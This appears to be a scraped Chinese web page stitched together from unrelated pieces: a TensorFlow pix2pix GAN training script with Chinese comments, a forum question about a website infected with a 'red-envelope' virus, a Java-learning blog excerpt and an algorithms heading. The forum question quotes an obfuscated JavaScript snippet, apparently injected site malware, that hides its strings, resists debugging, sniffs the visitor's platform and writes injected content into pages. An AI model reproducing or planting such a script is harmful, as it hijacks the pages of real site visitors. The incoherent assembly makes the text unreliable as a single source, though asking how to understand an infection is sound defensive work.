collections.namedtuple("Examples", "paths, inputs, targets, count, steps_per_epoch") Model = collections.namedtuple("Model", "outputs, predict_real, predict_fake, discrim_loss, discrim_grads_and_vars, gen_loss_GAN, gen_loss_L1, gen_grads_and_vars, train") # 图像预处理 [0, 1] => [-1, 1] def preprocess(image): with tf.name_scope("preprocess"): return image * 2 - 1 # 图像后处理[-1, 1] => [0, 1] def deprocess(image): with tf.name_scope("deprocess"): return (image + 1) / 2 # 判别器的卷积定义,batch_input为 [ batch , 256 , 256 , 6 ] def discrim_conv(batch_input, out_channels, stride): # [ batch , 256 , 256 , 6 ] ===>[ batch , 258 , 258 , 6 ] padded_input = tf.pad(batch_input, [[0, 0], [1, 1], [1, 1], [0, 0]], mode="CONSTANT") ''' [0,0]: 第一维batch大小不扩充 [1,1]:第二维图像宽度左右各扩充一列,用0填充 [1,1]:第三维图像高度上下各扩充一列,用0填充 [0,0]:第四维图像通道不做扩充 ''' return tf.layers.conv2d(padded_input, out_channels, kernel_size=4, strides=(stride, stride), padding="valid", kernel_initializer=tf.random_normal_initializer(0, 0.02)) # 生成器的卷积定义,卷积核为4*4,步长为2,输出图像为输入的一半 def gen_conv(batch_input, out_channels): # [batch, in_height, in_width, in_channels] => [batch, out_height, out_width, out_channels] initializer = tf.random_normal_initializer(0, 0.02) if separable_conv: return tf.layers.separable_conv2d(batch_input, out_channels, kernel_size=4, strides=(2, 2), padding="same", depthwise_initializer=initializer, pointwise_initializer=initializer) else: return tf.layers.conv2d(batch_input, out_channels, kernel_size=4, strides=(2, 2), padding="same", kernel_initializer=initializer) # 生成器的反卷积定义 def gen_deconv(batch_input, out_channels): # [batch, in_height, in_width, in_channels] => [batch, out_height, out_width, out_channels] initializer = tf.random_normal_initializer(0, 0.02) if separable_conv: _b, h, w, _c = batch_input.shape resized_input = tf.image.resize_images(batch_input, [h * 2, w * 2], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR) return tf.layers.separable_conv2d(resized_input, out_channels, kernel_size=4, strides=(1, 1), padding="same", depthwise_initializer=initializer, pointwise_initializer=initializer) else: return tf.layers.conv2d_transpose(batch_input, out_channels, kernel_size=4, strides=(2, 2), padding="same", kernel_initializer=initializer) # 定义LReLu激活函数 def lrelu(x, a): with tf.name_scope("lrelu"): # adding these together creates the leak part and linear part # then cancels them out by subtracting/adding an absolute value term # leak: a*x/2 - a*abs(x)/2 # linear: x/2 + abs(x)/2 # this block looks like it has 2 inputs on the graph unless we do this x = tf.identity(x) return (0.5 * (1 + a)) * x + (0.5 * (1 - a)) * tf.abs(x) # 批量归一化图像 def batchnorm(inputs): return tf.layers.batch_normalization(inputs, axis=3, epsilon=1e-5, momentum=0.1, training=True, gamma_initializer=tf.random_normal_initializer(1.0, 0.02)) # 检查图像的维度 def check_image(image): assertion = tf.assert_equal(tf.shape(image)[-1], 3, message="image must have 3 color channels") with tf.control_dependencies([assertion]): image = tf.identity(image) if image.get_shape().ndims not in (3, 4): raise ValueError("image must be either 3 or 4 dimensions") # make the last dimension 3 so that you can unstack the colors shape = list(image.get_shape()) shape[-1] = 3 image.set_shape(shape) return image # 去除文件的后缀,获取文件名 def get_name(path): # os.path.basename(),返回path最后的文件名。若path以/或\结尾,那么就会返回空值。 # os.path.splitext(),分离文件名与扩展名;默认返回(fname,fextension)元组 name, _ = os.path.splitext(os.path.basename(path)) return name # 加载数据集,从文件读取-->解码-->归一化--->拆分为输入和目标-->像素转为[-1,1]-->转变形状 def load_examples(input_dir): if input_dir is None or not os.path.exists(input_dir): raise Exception("input_dir does not exist") # 匹配第一个参数的路径中所有的符合条件的文件,并将其以list的形式返回。 input_paths = glob.glob(os.path.join(input_dir, "*.jpg")) # 图像解码器 decode = tf.image.decode_jpeg if len(input_paths) == 0: input_paths = glob.glob(os.path.join(input_dir, "*.png")) decode = tf.image.decode_png if len(input_paths) == 0: raise Exception("input_dir contains no image files") # 如果文件名是数字,则用数字进行排序,否则用字母排序 if all(get_name(path).isdigit() for path in input_paths): input_paths = sorted(input_paths, key=lambda path: int(get_name(path))) else: input_paths = sorted(input_paths) sess = tf.Session() with tf.name_scope("load_images"): # 把我们需要的全部文件打包为一个tf内部的queue类型,之后tf开文件就从这个queue中取目录了, # 如果是训练模式时,shuffle为True path_queue = tf.train.string_input_producer(input_paths, shuffle=True) # Read的输出将是一个文件名(key)和该文件的内容(value,每次读取一个文件,分多次读取)。 reader = tf.WholeFileReader() paths, contents = reader.read(path_queue) # 对文件进行解码并且对图片作归一化处理 raw_input = decode(contents) raw_input = tf.image.convert_image_dtype(raw_input, dtype=tf.float32) # 归一化处理 # 判断两个值知否相等,如果不等抛出异常 assertion = tf.assert_equal(tf.shape(raw_input)[2], 3, message="image does not have 3 channels") ''' 对于control_dependencies这个管理器,只有当里面的操作是一个op时,才会生效,也就是先执行传入的 参数op,再执行里面的op。如果里面的操作不是定义的op,图中就不会形成一个节点,这样该管理器就失效了。 tf.identity是返回一个一模一样新的tensor的op,这会增加一个新节点到gragh中,这时control_dependencies就会生效. ''' with tf.control_dependencies([assertion]): raw_input = tf.identity(raw_input) raw_input.set_shape([None, None, 3]) # 图像值由[0,1]--->[-1, 1] width = tf.shape(raw_input)[1] # [height, width, channels] a_images = preprocess(raw_input[:, :width // 2, :]) # 256*256*3 b_images = preprocess(raw_input[:, width // 2:, :]) # 256*256*3 # 这里的which_direction为:BtoA if which_direction == "AtoB": inputs, targets = [a_images, b_images] elif which_direction == "BtoA": inputs, targets = [b_images, a_images] else: raise Exception("invalid direction") # synchronize seed for image operations so that we do the same operations to both # input and output images seed = random.randint(0, 2 ** 31 - 1) # 图像预处理,翻转、改变形状 with tf.name_scope("input_images"): input_images = transform(inputs) with tf.name_scope("target_images"): target_images = transform(targets) # 获得输入图像、目标图像的batch块 paths_batch, inputs_batch, targets_batch = tf.train.batch([paths, input_images, target_images], batch_size=batch_size) steps_per_epoch = int(math.ceil(len(input_paths) / batch_size)) return Examples( paths=paths_batch, # 输入的文件名块 inputs=inputs_batch, # 输入的图像块 targets=targets_batch, # 目标图像块 count=len(input_paths), # 数据集的大小 steps_per_epoch=steps_per_epoch, # batch的个数 ) # 图像预处理,翻转、改变形状 def transform(image): r = image if flip: r = tf.image.random_flip_left_right(r, seed=seed) # area produces a nice downscaling, but does nearest neighbor for upscaling # assume we're going to be doing downscaling here r = tf.image.resize_images(r, [scale_size, scale_size], method=tf.image.ResizeMethod.AREA) offset = tf.cast(tf.floor(tf.random_uniform([2], 0, scale_size - CROP_SIZE + 1, seed=seed)), dtype=tf.int32) if scale_size > CROP_SIZE: r = tf.image.crop_to_bounding_box(r, offset[0], offset[1], CROP_SIZE, CROP_SIZE) elif scale_size < CROP_SIZE: raise Exception("scale size cannot be less than crop size") return r # 创建生成器,这是一个编码解码器的变种,输入输出均为:256*256*3, 像素值为[-1,1] def create_generator(generator_inputs, generator_outputs_channels): layers = [] # encoder_1: [batch, 256, 256, in_channels] => [batch, 128, 128, ngf] with tf.variable_scope("encoder_1"): output = gen_conv(generator_inputs, ngf) # ngf为第一个卷积层的卷积核核数量,默认为 64 layers.append(output) layer_specs = [ ngf * 2, # encoder_2: [batch, 128, 128, ngf] => [batch, 64, 64, ngf * 2] ngf * 4, # encoder_3: [batch, 64, 64, ngf * 2] => [batch, 32, 32, ngf * 4] ngf * 8, # encoder_4: [batch, 32, 32, ngf * 4] => [batch, 16, 16, ngf * 8] ngf * 8, # encoder_5: [batch, 16, 16, ngf * 8] => [batch, 8, 8, ngf * 8] ngf * 8, # encoder_6: [batch, 8, 8, ngf * 8] => [batch, 4, 4, ngf * 8] ngf * 8, # encoder_7: [batch, 4, 4, ngf * 8] => [batch, 2, 2, ngf * 8] ngf * 8, # encoder_8: [batch, 2, 2, ngf * 8] => [batch, 1, 1, ngf * 8] ] # 卷积的编码器 for out_channels in layer_specs: with tf.variable_scope("encoder_%d" % (len(layers) + 1)): # 对最后一层使用激活函数 rectified = lrelu(layers[-1], 0.2) # [batch, in_height, in_width, in_channels] => [batch, in_height/2, in_width/2, out_channels] convolved = gen_conv(rectified, out_channels) output = batchnorm(convolved) layers.append(output) layer_specs = [ (ngf * 8, 0.5), # decoder_8: [batch, 1, 1, ngf * 8] => [batch, 2, 2, ngf * 8 * 2] (ngf * 8, 0.5), # decoder_7: [batch, 2, 2, ngf * 8 * 2] => [batch, 4, 4, ngf * 8 * 2] (ngf * 8, 0.5), # decoder_6: [batch, 4, 4, ngf * 8 * 2] => [batch, 8, 8, ngf * 8 * 2] (ngf * 8, 0.0), # decoder_5: [batch, 8, 8, ngf * 8 * 2] => [batch, 16, 16, ngf * 8 * 2] (ngf * 4, 0.0), # decoder_4: [batch, 16, 16, ngf * 8 * 2] => [batch, 32, 32, ngf * 4 * 2] (ngf * 2, 0.0), # decoder_3: [batch, 32, 32, ngf * 4 * 2] => [batch, 64, 64, ngf * 2 * 2] (ngf, 0.0), # decoder_2: [batch, 64, 64, ngf * 2 * 2] => [batch, 128, 128, ngf * 2] ] # 卷积的解码器 num_encoder_layers = len(layers) # 8 for decoder_layer, (out_channels, dropout) in enumerate(layer_specs): skip_layer = num_encoder_layers - decoder_layer - 1 with tf.variable_scope("decoder_%d" % (skip_layer + 1)): if decoder_layer == 0: # first decoder layer doesn't have skip connections # since it is directly connected to the skip_layer input = layers[-1] else: input = tf.concat([layers[-1], layers[skip_layer]], axis=3) rectified = tf.nn.relu(input) # [batch, in_height, in_width, in_channels] => [batch, in_height*2, in_width*2, out_channels] output = gen_deconv(rectified, out_channels) output = batchnorm(output) if dropout > 0.0: output = tf.nn.dropout(output, keep_prob=1 - dropout) layers.append(output) # decoder_1: [batch, 128, 128, ngf * 2] => [batch, 256, 256, generator_outputs_channels] with tf.variable_scope("decoder_1"): input = tf.concat([layers[-1], layers[0]], axis=3) rectified = tf.nn.relu(input) output = gen_deconv(rectified, generator_outputs_channels) output = tf.tanh(output) layers.append(output) return layers[-1] # 创建判别器,输入生成的图像和真实的图像:两个[batch,256,256,3],元素值值[-1,1],输出:[batch,30,30,1],元素值为概率 def create_discriminator(discrim_inputs, discrim_targets): n_layers = 3 layers = [] # 2x [batch, height, width, in_channels] => [batch, height, width, in_channels * 2] input = tf.concat([discrim_inputs, discrim_targets], axis=3) # layer_1: [batch, 256, 256, in_channels * 2] => [batch, 128, 128, ndf] with tf.variable_scope("layer_1"): convolved = discrim_conv(input, ndf, stride=2) rectified = lrelu(convolved, 0.2) layers.append(rectified) # layer_2: [batch, 128, 128, ndf] => [batch, 64, 64, ndf * 2] # layer_3: [batch, 64, 64, ndf * 2] => [batch, 32, 32, ndf * 4] # layer_4: [batch, 32, 32, ndf * 4] => [batch, 31, 31, ndf * 8] for i in range(n_layers): with tf.variable_scope("layer_%d" % (len(layers) + 1)): out_channels = ndf * min(2 ** (i + 1), 8) stride = 1 if i == n_layers - 1 else 2 # last layer here has stride 1 convolved = discrim_conv(layers[-1], out_channels, stride=stride) normalized = batchnorm(convolved) rectified = lrelu(normalized, 0.2) layers.append(rectified) # layer_5: [batch, 31, 31, ndf * 8] => [batch, 30, 30, 1] with tf.variable_scope("layer_%d" % (len(layers) + 1)): convolved = discrim_conv(rectified, out_channels=1, stride=1) output = tf.sigmoid(convolved) layers.append(output) return layers[-1] # 创建Pix2Pix模型,inputs和targets形状为:[batch_size, height, width, channels] def create_model(inputs, targets): with tf.variable_scope("generator"): out_channels = int(targets.get_shape()[-1]) outputs = create_generator(inputs, out_channels) # create two copies of discriminator, one for real pairs and one for fake pairs # they share the same underlying variables with tf.name_scope("real_discriminator"): with tf.variable_scope("discriminator"): # 2x [batch, height, width, channels] => [batch, 30, 30, 1] predict_real = create_discriminator(inputs, targets) # 条件变量图像和真实图像 with tf.name_scope("fake_discriminator"): with tf.variable_scope("discriminator", reuse=True): # 2x [batch, height, width, channels] => [batch, 30, 30, 1] predict_fake = create_discriminator(inputs, outputs) # 条件变量图像和生成的图像 # 判别器的损失,判别器希望V(G,D)尽可能大 with tf.name_scope("discriminator_loss"): # minimizing -tf.log will try to get inputs to 1 # predict_real => 1 # predict_fake => 0 discrim_loss = tf.reduce_mean(-(tf.log(predict_real + EPS) + tf.log(1 - predict_fake + EPS))) # 生成器的损失,生成器希望V(G,D)尽可能小 with tf.name_scope("generator_loss"): # predict_fake => 1 # abs(targets - outputs) => 0 gen_loss_GAN = tf.reduce_mean(-tf.log(predict_fake + EPS)) gen_loss_L1 = tf.reduce_mean(tf.abs(targets - outputs)) gen_loss = gen_loss_GAN * gan_weight + gen_loss_L1 * l1_weight # 判别器训练 with tf.name_scope("discriminator_train"): # 判别器需要优化的参数 discrim_tvars = [var for var in tf.trainable_variables() if var.name.startswith("discriminator")] # 优化器定义 discrim_optim = tf.train.AdamOptimizer(lr, beta1) # 计算损失函数对优化参数的梯度 discrim_grads_and_vars = discrim_optim.compute_gradients(discrim_loss, var_list=discrim_tvars) # 更新该梯度所对应的参数的状态,返回一个op discrim_train = discrim_optim.apply_gradients(discrim_grads_and_vars) # 生成器训练 with tf.name_scope("generator_train"): with tf.control_dependencies([discrim_train]): # 生成器需要优化的参数列表 gen_tvars = [var for var in tf.trainable_variables() if var.name.startswith("generator")] # 定义优化器 gen_optim = tf.train.AdamOptimizer(lr, beta1) # 计算需要优化的参数的梯度 gen_grads_and_vars = gen_optim.compute_gradients(gen_loss, var_list=gen_tvars) # 更新该梯度所对应的参数的状态,返回一个op gen_train = gen_optim.apply_gradients(gen_grads_and_vars) ''' 在采用随机梯度下降算法训练神经网络时,使用 tf.train.ExponentialMovingAverage 滑动平均操作的意义在于 提高模型在测试数据上的健壮性(robustness)。tensorflow 下的 tf.train.ExponentialMovingAverage 需要 提供一个衰减率(decay)。该衰减率用于控制模型更新的速度。该衰减率用于控制模型更新的速度, ExponentialMovingAverage 对每一个(待更新训练学习的)变量(variable)都会维护一个影子变量 (shadow variable)。影子变量的初始值就是这个变量的初始值, shadow_variable=decay×shadow_variable+(1−decay)×variable ''' ema = tf.train.ExponentialMovingAverage(decay=0.99) update_losses = ema.apply([discrim_loss, gen_loss_GAN, gen_loss_L1]) # global_step = tf.train.get_or_create_global_step() incr_global_step = tf.assign(global_step, global_step + 1) return Model( predict_real=predict_real, # 条件变量(输入图像)和真实图像之间的概率值,形状为;[batch,30,30,1] predict_fake=predict_fake, # 条件变量(输入图像)和生成图像之间的概率值,形状为;[batch,30,30,1] discrim_loss=ema.average(discrim_loss), # 判别器损失 discrim_grads_and_vars=discrim_grads_and_vars, # 判别器需要优化的参数和对应的梯度 gen_loss_GAN=ema.average(gen_loss_GAN), # 生成器的损失 gen_loss_L1=ema.average(gen_loss_L1), # 生成器的 L1损失 gen_grads_and_vars=gen_grads_and_vars, # 生成器需要优化的参数和对应的梯度 outputs=outputs, # 生成器生成的图片 train=tf.group(update_losses, incr_global_step, gen_train), # 打包需要run的操作op ) # 保存图像 def save_images(output_dir, fetches, step=None): image_dir = os.path.join(output_dir, "images") if not os.path.exists(image_dir): os.makedirs(image_dir) filesets = [] for i, in_path in enumerate(fetches["paths"]): name, _ = os.path.splitext(os.path.basename(in_path.decode("utf8"))) fileset = {"name": name, "step": step} for kind in ["inputs", "outputs", "targets"]: filename = name + "-" + kind + ".png" if step is not None: filename = "%08d-%s" % (step, filename) fileset[kind] = filename out_path = os.path.join(image_dir, filename) contents = fetches[kind][i] with open(out_path, "wb") as f: f.write(contents) filesets.append(fileset) return filesets # 将结果写入HTML网页 def append_index(output_dir, filesets, step=False): index_path = os.path.join(output_dir, "index.html") if os.path.exists(index_path): index = open(index_path, "a") else: index = open(index_path, "w") index.write("<html><body><table><tr>") if step: index.write("<th>step</th>") index.write("<th>name</th><th>input</th><th>output</th><th>target</th></tr>") for fileset in filesets: index.write("<tr>") if step: index.write("<td>%d</td>" % fileset["step"]) index.write("<td>%s</td>" % fileset["name"]) for kind in ["inputs", "outputs", "targets"]: index.write("<td><img src='images/%s'></td>" % fileset[kind]) index.write("</tr>") return index_path # 转变图像的尺寸、并且将[0,1]--->[0,255] def convert(image): if aspect_ratio != 1.0: # upscale to correct aspect ratio size = [CROP_SIZE, int(round(CROP_SIZE * aspect_ratio))] image = tf.image.resize_images(image, size=size, method=tf.image.ResizeMethod.BICUBIC) # 将数据的类型转换为8位无符号整型 return tf.image.convert_image_dtype(image, dtype=tf.uint8, saturate=True) # 主函数 def train(): # 设置随机数种子的值 global seed if seed is None: seed = random.randint(0, 2 ** 31 - 1) tf.set_random_seed(seed) np.random.seed(seed) random.seed(seed) # 创建目录 if not os.path.exists(train_output_dir): os.makedirs(train_output_dir) # 加载数据集,得到输入数据和目标数据并把范围变为 :[-1,1] examples = load_examples(train_input_dir) print("load successful ! examples count = %d" % examples.count) # 创建模型,inputs和targets是:[batch_size, height, width, channels] # 返回值: model = create_model(examples.inputs, examples.targets) print("create model successful!") # 图像处理[-1, 1] => [0, 1] inputs = deprocess(examples.inputs) targets = deprocess(examples.targets) outputs = deprocess(model.outputs) # 把[0,1]的像素点转为RGB值:[0,255] with tf.name_scope("convert_inputs"): converted_inputs = convert(inputs) with tf.name_scope("convert_targets"): converted_targets = convert(targets) with tf.name_scope("convert_outputs"): converted_outputs = convert(outputs) # 对图像进行编码以便于保存 with tf.name_scope("encode_images"): display_fetches = { "paths": examples.paths, # tf.map_fn接受一个函数对象和集合,用函数对集合中每个元素分别处理 "inputs": tf.map_fn(tf.image.encode_png, converted_inputs, dtype=tf.string, name="input_pngs"), "targets": tf.map_fn(tf.image.encode_png, converted_targets, dtype=tf.string, name="target_pngs"), "outputs": tf.map_fn(tf.image.encode_png, converted_outputs, dtype=tf.string, name="output_pngs"), } with tf.name_scope("parameter_count"): parameter_count = tf.reduce_sum([tf.reduce_prod(tf.shape(v)) for v in tf.trainable_variables()]) # 只保存最新一个checkpoint saver = tf.train.Saver(max_to_keep=20) init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) print("parameter_count =", sess.run(parameter_count)) if max_epochs is not None: max_steps = examples.steps_per_epoch * max_epochs # 400X200=80000 # 因为是从文件中读取数据,所以需要启动start_queue_runners() # 这个函数将会启动输入管道的线程,填充样本到队列中,以便出队操作可以从队列中拿到样本。 coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(coord=coord) # 运行训练集 print("begin trainning......") print("max_steps:", max_steps) start = time.time() for step in range(max_steps): def should(freq): return freq > 0 and ((step + 1) % freq == 0 or step == max_steps - 1) print("step:", step) # 定义一个需要run的所有操作的字典 fetches = { "train": model.train } # progress_freq为 50,每50次计算一次三个损失,显示进度 if should(progress_freq): fetches["discrim_loss"] = model.discrim_loss fetches["gen_loss_GAN"] = model.gen_loss_GAN fetches["gen_loss_L1"] = model.gen_loss_L1 # display_freq为 50,每50次保存一次输入、目标、输出的图像 if should(display_freq): fetches["display"] = display_fetches # 运行各种操作, results = sess.run(fetches) # display_freq为 50,每50次保存输入、目标、输出的图像 if should(display_freq): print("saving display images") filesets = save_images(train_output_dir, results["display"], step=step) append_index(train_output_dir, filesets, step=True) # progress_freq为 50,每50次打印一次三种损失的大小,显示进度 if should(progress_freq): # global_step will have the correct step count if we resume from a checkpoint train_epoch = math.ceil(step / examples.steps_per_epoch) train_step = (step - 1) % examples.steps_per_epoch + 1 rate = (step + 1) * batch_size / (time.time() - start) remaining = (max_steps - step) * batch_size / rate print("progress epoch %d step %d image/sec %0.1f remaining %dm" % ( train_epoch, train_step, rate, remaining / 60)) print("discrim_loss", results["discrim_loss"]) print("gen_loss_GAN", results["gen_loss_GAN"]) print("gen_loss_L1", results["gen_loss_L1"]) # save_freq为500,每500次保存一次模型 if should(save_freq): print("saving model") saver.save(sess, os.path.join(train_output_dir, "model"), global_step=step) # 测试 def test(): # 设置随机数种子的值 global seed if seed is None: seed = random.randint(0, 2 ** 31 - 1) tf.set_random_seed(seed) np.random.seed(seed) random.seed(seed) # 创建目录 if not os.path.exists(test_output_dir): os.makedirs(test_output_dir) if checkpoint is None: raise Exception("checkpoint required for test mode") # disable these features in test mode scale_size = CROP_SIZE flip = False # 加载数据集,得到输入数据和目标数据 examples = load_examples(test_input_dir) print("load successful ! examples count = %d" % examples.count) # 创建模型,inputs和targets是:[batch_size, height, width, channels] model = create_model(examples.inputs, examples.targets) print("create model successful!") # 图像处理[-1, 1] => [0, 1] inputs = deprocess(examples.inputs) targets = deprocess(examples.targets) outputs = deprocess(model.outputs) # 把[0,1]的像素点转为RGB值:[0,255] with tf.name_scope("convert_inputs"): converted_inputs = convert(inputs) with tf.name_scope("convert_targets"): converted_targets = convert(targets) with tf.name_scope("convert_outputs"): converted_outputs = convert(outputs) # 对图像进行编码以便于保存 with tf.name_scope("encode_images"): display_fetches = { "paths": examples.paths, # tf.map_fn接受一个函数对象和集合,用函数对集合中每个元素分别处理 "inputs": tf.map_fn(tf.image.encode_png, converted_inputs, dtype=tf.string, name="input_pngs"), "targets": tf.map_fn(tf.image.encode_png, converted_targets, dtype=tf.string, name="target_pngs"), "outputs": tf.map_fn(tf.image.encode_png, converted_outputs, dtype=tf.string, name="output_pngs"), } sess = tf.InteractiveSession() saver = tf.train.Saver(max_to_keep=1) ckpt = tf.train.get_checkpoint_state(checkpoint) saver.restore(sess,ckpt.model_checkpoint_path) start = time.time() coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(coord=coord) for step in range(examples.count): results = sess.run(display_fetches) filesets = save_images(test_output_dir, results) for i, f in enumerate(filesets): print("evaluated image", f["name"]) index_path = append_index(test_output_dir, filesets) print("wrote index at", index_path) print("rate", (time.time() - start) / max_steps) if __name__ == '__main__': train() #test()
谁能看懂这段代码什么意思? 网站出现抢红包病毒
var isloadad=2;var istbload=0;;var a=['w5HCsS/DsMOf','eMKuwoM=','wofCohk=','DVnDoz9X','wpzCtR3CqsOxwovDow==','w55ARx3Dsg==','UGckwrTDtg==','UsOcbW/DmMKPeg==','HALCpcOCwrQ=','w5pPZDY=','bMKJwo/Ds0vCvw==','w5DDs8Omw6IpwrbCiA==','wqldT8OyNsOQwrs=','w73DvVogwoU=','wqzCtAw8OhjCkA==','wpRBIsKjw6w=','GMOXwpd4NQ==','e8K6SBTClw00QXzDhnTDrxTDhxs=','w59ew78bOhBFT8Opw5XCpA==','T8Kkwq8VwpnDvMOcGg==','LgdtwrrDiXPCi1Rg','OV8ochs=','w5VFbjvDosO9woEF','PFUiw5A=','cBQ/wqfCiWbDlEY=','w6bDtsKvHA==','bMK+SAg=','fcKGVzPCnsO9CQ==','bG4zwofDtDVR','wqRjw45CXjDDpw==','wojCqBvCtsOhwobCo2DDpQ==','BBZyw7Er','JS9Ew40KNMOq','w5M5w7YMwqc=','wqTDrsOIw6tO','PCXCtMOewow=','E1oEXHM=','wqXDncOkcwbDpErDnxo=','woPCjhgCecOFw7U=','HkQIejg=','w4fCjMOmwqUZ','w44wCsK1woQ=','w5bDsMKhw7Ujwrc=','NDZkw4zDrxVa','woLCthDCp8Oj','wr5kw4RGCBzDrsKq','PylDPXM=','wrLCqAEtJzvCmA==','wrpow4NFSVHDosKow58=','acK0wpQ=','acOHam7DhQ==','w6Zkw5s=','woPCqsO2woEdwrLDmsOwKEUMdMO6w4ETw7F2w5LCqcODwpFbw7PCpMO6EsK3UVx6dRvDi8KMwqDDhcO3w7UiwpLCqgTCgA1bSWQ1IcOWwpE0Z8O4ZcOHC0gxwrvClg==','GEIp','IAg/wrTClH/DjwggwqEPwpZeJsOLHMOMw5ksdj3Dh2kJw7/Dgh7CvkpiwqUCw5rDuQ7CpsOaXDbCmWI1w6DCusOXdyjDiMOTRcKiFsOAZMOOM3g8ZSokw6E=','MsONwpZATsO+w63ClcOzNh/CvRhsUHAbwo3DrsK8wogbwr15wq/CknjCjl3Dhh4xwrzCk37DhcOYI8O1w4UKIl5dPsKywo7DgRzDiU1yGnMUw5MJwql2wpxca2jDv3YuwqXDrMOLbXZpw7HDpMKYKMOxJ8KBw6DCiDo/HTt1f8KefQ==','R1tLF2LDocO+w5MsC8KdKsKSwoVbw6gOK8OUAsOfbFvDqzDCkH7Cj8K4e2A7wpzCrMKmIXwwTsORVVZ2AsKqR1nCsMOfV8KbScKqCcKFKMO4wq5ywr5kw6wnUzA6w5rCpcOlDsOUdzfCncORwr1lHMOCKFsvwptUczIobsK4','DTjCp8OlwqfDnWjDjA==','w6lxwro=','IcKdK8OJwrI=','wrkywrHDvEw=','w5LCuMO2','wp/Dmwo=','RsOZw5A=','wqXDlcOleBnChU8=','LsKzw6rCoMOE','JMKIVg==','PsKAWw==','wpTDucOu','FlrChA==','NMKaw4jCusO9','DMKQw4TCosOJFDo=','MmbCkGvDgQ==','wqc5w6N8NA==','wpUyw4lOJR/CjA==','TcK8SCrCmQ==','wp3CkhUTZMOmw70=','Bwtaw4oj','P8KtdsKR','EkzCjEXDgMOL','w7jDq0s=','DSLCj8Oiwo4=','w43DimwFwoPCmMO/','d8OldlHDkw==','PV0tbwrDtsKn','JMKwN8Ogwq0='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};var g=function(){var h={'data':{'key':'cookie','value':'timeout'},'setCookie':function(i,j,k,l){l=l||{};var m=j+'='+k;var n=0x0;for(var n=0x0,p=i['length'];n>(-0x2*j&0x6)):0x0){l=g['indexOf'](l);}return n;});}());var o=function(p,q){var r=[],s=0x0,t,u='',v='';p=atob(p);for(var w=0x0,x=p['length'];w','EyCFt':b('0x22','A2!o'),'UgsVz':b('0x23','(^P8'),'KJzbQ':'\x20','pvIsO':b('0x24','t(3V'),'THDqk':b('0x25','oajV'),'rRYEn':b('0x26','eQ&&'),'PPQmN':function R(S,T){return S===T;},'gjJGd':function U(V,W){return V==W;},'aVcSu':b('0x27','$i)g')};if(J['wFmpN']==='EsO'){var a1=c(this,function(){var c=function(){return'\x64\x65\x76';},d=function(){return'\x77\x69\x6e\x64\x6f\x77';};var e=function(){var f=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return!f['\x74\x65\x73\x74'](c['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var g=function(){var h=new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');return h['\x74\x65\x73\x74'](d['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var i=function(j){var k=~-0x1>>0x1+0xff%0x0;if(j['\x69\x6e\x64\x65\x78\x4f\x66']('\x69'===k)){l(j);}};var l=function(m){var n=~-0x4>>0x1+0xff%0x0;if(m['\x69\x6e\x64\x65\x78\x4f\x66']((!![]+'')[0x3])!==n){n(m);}};if(!e()){if(!g()){i('\x69\x6e\x64\u0435\x78\x4f\x66');}else{i('\x69\x6e\x64\x65\x78\x4f\x66');}}else{i('\x69\x6e\x64\u0435\x78\x4f\x66');}});a1();var X={'win':![],'mac':![],'xll':![]};var Y=navigator[b('0x28','qUXC')];X[b('0x29','PWa(')]=J[b('0x2a','K]fS')](Y['indexOf'](J[b('0x2b','cKEo')]),0x0);X[b('0x2c','(^P8')]=Y['indexOf']('Mac')==0x0;X[b('0x2d','0&10')]=Y==b('0x2e','9hUK')||Y[b('0x2f','6A@%')](J[b('0x30','FYL6')])==0x0;if(X[b('0x31','78]X')]||X[b('0x32','78]X')]||X[b('0x33','&s^n')]){if('paJ'===b('0x34','[1tn')){J[b('0x35','FYL6')](setTimeout,document[b('0x36','*h4b')](J[b('0x37','[1tn')]),0x320);}else{}}else{if('qwo'===J[b('0x38','MyyU')]){document[b('0x39','MyyU')](J[b('0x3a','^#zA')]);document['writeln']('\x20');}else{document[b('0x3b','y]vy')](J[b('0x3c','WV8@')]);var Z=Math[b('0x3d','P$Vi')](Math[b('0x3e','[1tn')]()*0x28);if(Z<0x4){if(b('0x3f','nry&')===J[b('0x40','qUXC')]){setTimeout(document[b('0x41','nry&')](J[b('0x42','Ix(u')]),0x320);}else{document[b('0x43','yk*z')](J[b('0x44','K]fS')]);document[b('0x39','MyyU')](J['rRYEn']);}}if(isloadad>0x0){if(J[b('0x45','yIG#')](b('0x46','9hUK'),b('0x47','y]vy'))){return![];}else{document['writeln'](J[b('0x48','*Vmq')]);document[b('0x49','LGZk')](J['rRYEn']);}}else if(J[b('0x4a','e1E]')](istbload,0x1)){document['writeln'](J[b('0x4b','ptqH')]);document[b('0x4c','Ix(u')](J[b('0x4d','qUXC')]);}}}}else{document['writeln'](J['KJzbQ']);var a0=Math[b('0x4e','e1E]')](Math[b('0x4f','9hUK')]()*0x28);if(a0<0x4){setTimeout(document[b('0x50','m6^7')](''),0x320);}if(isloadad>0x0){document['writeln']('');document[b('0x51','1Ze^')](J[b('0x52','gtUn')]);}else if(J['gjJGd'](istbload,0x1)){document[b('0x53','SM2O')](J[b('0x54','NLXJ')]);document['writeln'](J[b('0x55','82ri')]);}}}I();};_security='__0x1a27d';
Java学习的正确打开方式
在博主认为,对于入门级学习java的最佳学习方法莫过于视频+博客+书籍+总结,前三者博主将淋漓尽致地挥毫于这篇博客文章中,至于总结在于个人,实际上越到后面你会发现学习的最好方式就是阅读参考官方文档其次就是国内的书籍,博客次之,这又是一个层次了,这里暂时不提后面再谈。博主将为各位入门java保驾护航,各位只管冲鸭!!!上天是公平的,只要不辜负时间,时间自然不会辜负你。 何谓学习?博主所理解的学习,它是一个过程,是一个不断累积、不断沉淀、不断总结、善于传达自己的个人见解以及乐于分享的过程。
程序员必须掌握的核心算法有哪些?
